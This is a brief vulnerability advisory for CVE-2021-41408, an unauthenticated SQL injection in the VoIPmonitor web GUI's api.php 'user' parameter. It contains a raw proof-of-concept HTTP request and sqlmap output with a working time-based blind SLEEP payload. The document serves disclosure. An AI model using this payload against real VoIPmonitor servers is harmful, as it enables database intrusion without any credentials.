Headline
CVE-2021-41408: voipmonitor unauth sql injection
VoIPmonitor WEB GUI up to version 24.61 is affected by SQL injection through the “api.php” file and “user” parameter.
sql injection on user parameter. since, api.php file doesnt need any authentication attacker can exploit this vulnerability without any valid session or credentials.
GET /voipmonitorpath/api.php?action=login&user=[inject_here]&pass=trollz HTTP/1.1 Host: vulnerableinstance User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 0 Connection: close
sqlmap result:
Parameter: #1* (URI) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: http://vulnerableinstance:80/voipmonitorpath/api.php?action=login&user=’ AND (SELECT 9158 FROM (SELECT(SLEEP(5)))Evax) AND 'jvDj’=’jvDj&pass=trollz — [02:19:33] [INFO] testing MySQL [02:20:22] [INFO] confirming MySQL web application technology: Nginx 1.14.2, PHP back-end DBMS: MySQL >= 5.0.0 (MariaDB fork) banner: ‘10.3.29-MariaDB-1:10.3.29+maria~stretch’
cc: @cnbrkbolat & @R0h1rr1m